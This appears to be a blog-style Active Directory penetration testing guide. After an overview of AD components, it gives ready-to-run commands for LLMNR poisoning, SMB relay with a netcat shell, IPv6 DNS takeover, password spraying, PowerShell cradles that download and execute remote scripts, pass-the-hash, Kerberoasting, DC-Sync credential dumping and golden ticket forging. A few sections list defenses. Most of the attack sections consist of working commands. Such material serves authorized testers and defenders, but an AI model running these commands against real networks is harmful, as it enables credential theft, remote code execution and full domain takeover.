Active Directory Penetration Testing Guide
Active Directory Overview
Active Directory is a directory service developed by Microsoft to manage Windows domain networks. It stores information related to objects such as Computers, Users, Printers, etc. Think of it as a phone book for Windows. It authenticates using Kerberos tickets, and non-Windows devices such as Linux machines, firewalls, etc. can also authenticate via RADIUS or LDAP.
Why Active Directory Pentest?
- Active Directory is the most commonly used identity management service in the world
- 95% of Fortune 1000 companies implement it in their networks
- Can be exploited without ever attacking patchable exploits
- Instead, we abuse features, trusts, components, and more
Physical Components
Domain Controllers
- A server with the AD DS server role installed that has been promoted to a domain controller
- Hosts a copy of the AD DS directory store
- Provides authentication and authorization services
- Replicates updates to other domain controllers in the domain and forest
- Allows administrative access to manage user accounts and network resources
AD DS Data Store
- Contains database files and processes that store directory information for users, services, and applications
- Consists of the
Ntds.ditfile - Stored by default in
%SystemRoot%\NTDSfolder on all domain controllers
Logical AD Components
AD DS Schema
Defines every type of object that can be stored in the directory and enforces rules regarding object creation and configuration.
Domains, Trees, Forests & OUs
- Domains: Used to group and manage objects in an organization
- Trees: A hierarchy of domains in AD DS — all share a contiguous namespace and by default create two-way transitive trusts
- Forests: A collection of one or more domain trees sharing a common configuration partition, global catalog, and the Enterprise Admins/Schema Admins groups
- OUs: Containers that hold users, groups, computers, and other OUs for hierarchical management and policy application
Trusts
- Directional: Trust direction flows from trusting domain to trusted domain
- Transitive: Extended beyond a two-domain trust to include other trusted domains
Active Directory Reconnaissance
Host Discovery
1
nmap -sn -v 192.168.10.0/24 -oA host_discovery_scan.txt
Full Port Scan
1
nmap -p- --min-rate 10000 -oA all_port_scan.txt 192.168.10.5
AD-specific Port Scan
1
nmap -T4 -sCV -p 139,445,389,88,53,636 -oA ad_port_scan.txt 192.168.10.5
Network Mapping with nxc
1
nxc smb 192.168.10.0/24
Note: CrackMapExec (cme) is no longer maintained. Use nxc (NetExec) instead.
Initial Attack Vectors
LLMNR Poisoning
LLMNR is used to identify hosts when DNS fails. The key flaw is that services utilize a user’s username and NTLMv1/NTLMv2 hash when appropriately responded to.
Exploitation:
1
2
3
4
5
6
7
8
# Step 1: Run Responder
sudo responder -I eth0 -dw
# Step 2: Wait for an event (failed DNS resolution, lazy employee)
# Step 3: Capture NTLMv1/NTLMv2 hashes
# Step 4: Crack with hashcat
hashcat -m <hash_mode> hashes.txt rockyou.txt
Defense:
- Disable LLMNR via Group Policy: Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNS Client > Turn OFF Multicast Name Resolution
- Disable NBT-NS: Network Adapter Properties > TCP/IPv4 > Advanced > WINS > Disable NetBIOS over TCP/IP
SMB Relay
Instead of cracking hashes from Responder, relay them to specific machines and gain local admin access.
Prerequisites:
- SMB signing disabled on target
- Captured user is a local admin on multiple machines
Exploitation:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
# Step 1: Find hosts with SMB signing disabled
nmap --script=smb2-security-mode.nse -p 445 192.168.10.0/24
nxc smb 192.168.10.0/24
# Step 2: Edit Responder config (set SMB=off HTTP=off)
# Step 3: Run Responder
sudo responder -I eth0 -dw
# Step 4: Run ntlmrelayx
impacket-ntlmrelayx -tf targets.txt -smb2support
# Step 5: Get interactive shell
impacket-ntlmrelayx -tf targets.txt -smb2support -i
# Step 6: Connect via netcat
nc 192.168.10.1 1337
Defense: Enable SMB Signing on all devices, disable NTLM authentication, enforce account tiering, restrict local admin accounts.
IPv6 DNS Takeover
IPv6 is running but not utilized — so no one is handling its DNS resolution. An attacker spoofs IPv6 DNS to intercept traffic and relay authentication to the Domain Controller via LDAP or SMB.
Exploitation:
1
2
3
4
5
# Run mitm6
mitm6 -d pentest.local
# Run ntlmrelayx (in another terminal)
impacket-ntlmrelayx -6 -t ldaps://dc-ip -wh fakewpad.pentest.local -l output_directory
Defense: Block DHCPv6 traffic and incoming router advertisements via Windows Firewall Group Policy. Enable LDAP signing and LDAP channel binding.
Password Spraying
Most initial footholds into AD environments come through password spray. Curate a wordlist based on the organization name:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# Enumerate users via SMB null session
nxc smb <dc_ip> -u ' ' -p ' ' --users
# Enumerate via guest user
nxc smb <dc_ip> -u 'aaa' -p 'aaa' --users
# Password spray
nxc smb <dc_ip> -u users_list.txt -p 'Orgname@1234' | tee out.txt
# Spray local accounts
nxc smb <ip_range> -u Administrators -p 'Orgname@1234' --local-auth | tee out.txt
# Check WinRM
nxc winrm <ip_address> -u 'john.cena' -p 'Orgname@1234'
# Connect via Evil-WinRM
evil-winrm -i <ip_address> -u 'john.cena' -p 'Orgname@1234'
CVE Checks
Old-but-gold CVEs like ZeroLogon, EternalBlue, etc. can lead to quick wins. Run a Nessus scan on the in-scope IP range to identify them.
Post-Compromise Enumeration
Bypass PowerShell Security with InvisiShell
1
iex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1')
PowerView Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
# Load PowerView
iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ZeroDayLab/PowerSploit/master/Recon/PowerView.ps1')
# Domain info
Get-Domain
Get-DomainSID
Get-DomainController
(Get-DomainPolicyData).systemaccess
# Users & Groups
Get-DomainUser
Get-DomainUser -Identity john.cena -Properties *
Get-DomainGroup | select Name
Get-DomainGroup *admin*
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
# Computers
Get-DomainComputer | select Name
Get-DomainComputer -OperatingSystem "Server 2022"
# Active sessions
Get-NetLoggedon -ComputerName johncena-dc
Get-LoggedonLocal -ComputerName johncena-dc
Get-LastLoggedOn -ComputerName dcorp-adminsrv
# Shares
Invoke-ShareFinder -Verbose
Invoke-FileFinder -Verbose
Get-NetFileServer
BloodHound
1
2
3
powershell -ep bypass
..\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -Domain MARVEL.local -ZipFileName out.zip
Post-Compromise Attacks
Pass the Hash / Pass the Password
1
2
3
4
5
6
7
8
9
# Pass the password
nxc smb <ip_range> -u 'john.cena' -p 'johncena@123'
# Pass the hash
nxc smb <ip_range> -u 'john.cena' -H <ntlm_hash>
# Local auth variants
nxc smb <ip_range> -u 'john.cena' -p 'johncena@123' --local-auth
nxc smb <ip_range> -u 'john.cena' -H <ntlm_hash> --local-auth
GPP / cPassword Attack (MS14-025)
Group Policy Preferences allowed admins to embed credentials encrypted with a key that was accidentally released. Patched in MS14-025 but legacy deployments still exist.
1
gpp-decrypt <insert_hash_here>
Kerberoasting
Offline cracking of service account passwords via TGS ticket requests.
1
2
3
4
5
# Request TGS hashes
impacket-GetUserSPNs -dc-ip <dc_ip> <DOMAIN/username:password> -request
# Crack with hashcat
hashcat -m 13100 kerberoast.txt rockyou.txt
DC-Sync Attack
Simulate a Domain Controller and retrieve password data via domain replication — without code execution on the DC.
1
impacket-secretsdump <domain>/<username>:<password>@<ip_address>
Persistence
Golden Ticket Attack
A Golden Ticket is signed and encrypted using the krbtgt account hash, making it a valid TGT that can impersonate any user from any machine — even non-domain joined.
Best practice: Change the
krbtgtpassword twice after detecting a compromise (password history is maintained).
1
2
3
impacket-ticketer -nthash b18b4b218eccad1c223306ea1916885f \
-domain-sid S-1-5-21-1339291983-1349129144-367733775 \
-domain wwe.local -dc-ip 10.10.10.1 Administrator
With the modern EDR/XDR era, Active Directory exploitation is becoming more challenging — and more fun. The above techniques are a solid starting point for any seasoned pentester who loves to pwn Active Directory environments.